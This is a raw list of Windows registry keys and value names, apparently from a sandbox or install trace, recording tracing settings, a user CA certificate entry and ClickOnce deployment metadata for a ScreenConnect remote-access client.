EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Blob
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}
NonCanonicalData
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
{c989bb7a-8385-4715-98cf-a741a8edb823}!ApplicationTrust
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
lock!010000004e01ef06ac040000d417000000000000000000007475edc18215db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}
NonCanonicalData
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!DeploymentSourceUri
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!ApplicationSourceUri
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!IsFullTrust
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!IsShellVisible
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PreviousBind
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PendingBind
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!ExcludedDeployment
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PendingDeployment
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!DeploymentProviderUri
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!MinimumRequiredVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!LastCheckTime
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!UpdateSkippedDeployment
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!UpdateSkipTime
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!AppType
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!CurrentBind
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
pin!S_{3f471841-eef2-47d6-89c0-d028f03a4ad5}
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.ClientService.exe_e781b1ee36f7c0e0
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsBackstageShell.exe_898f6d085da479bc
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsFileManager.exe.config_ceab8affc7343daa
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsFileManager.exe.config_ceab8affc7343daa
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsClient.exe.config_f7f106a5cc529540
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsClient.exe.config_f7f106a5cc529540
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsBackstageShell.exe.config_61230ac9d37a71e2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsBackstageShell.exe.config_61230ac9d37a71e2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsFileManager.exe_0e21f87bfcff26be
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsFileManager.exe_0e21f87bfcff26be
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\Files
ScreenConnect.Client.dll_fc1d7bd48553fcab
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\Files
ScreenConnect.ClientService.dll_e781b1c636f7bfae
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\Files
ScreenConnect.ClientService.dll_e781b1c636f7bfae
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\Files
ScreenConnect.Windows.dll_fc0d83aff7df0b5b
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\Files
ScreenConnect.Windows.dll_fc0d83aff7df0b5b
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\Files
ScreenConnect.WindowsClient.exe_6492277df2db17d2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\Files
ScreenConnect.WindowsClient.exe_6492277df2db17d2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\Files
ScreenConnect.Core.dll_b96889d378047e27
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\Files
ScreenConnect.Core.dll_b96889d378047e27
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment
OnlineAppQuotaUsageEstimate
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
lock!100000001a2f1207ac040000d4170000000000000000000070aa1f208815db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
lock!0e0000001a2f1207ac040000d4170000000000000000000070aa1f208815db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
lock!0c0000001a2f1207ac040000d4170000000000000000000070aa1f208815db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
lock!0a0000001a2f1207ac040000d4170000000000000000000070aa1f208815db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
lock!080000001a2f1207ac040000d4170000000000000000000070aa1f208815db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
lock!060000001a2f1207ac040000d4170000000000000000000070aa1f208815db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975
lock!040000001a2f1207ac040000d4170000000000000000000070aa1f208815db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
PreparedForExecution
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
lock!110000002a2f1207ac040000d417000000000000000000001d0d22208815db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.ClientService.exe_5e8c1e841cd8db20
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsBackstageShell.exe_89b7a517a15abfdc
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsFileManager.exe.config_5db10293a642be8a
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
ScreenConnect.WindowsClient.exe.config_432322067acab5c0
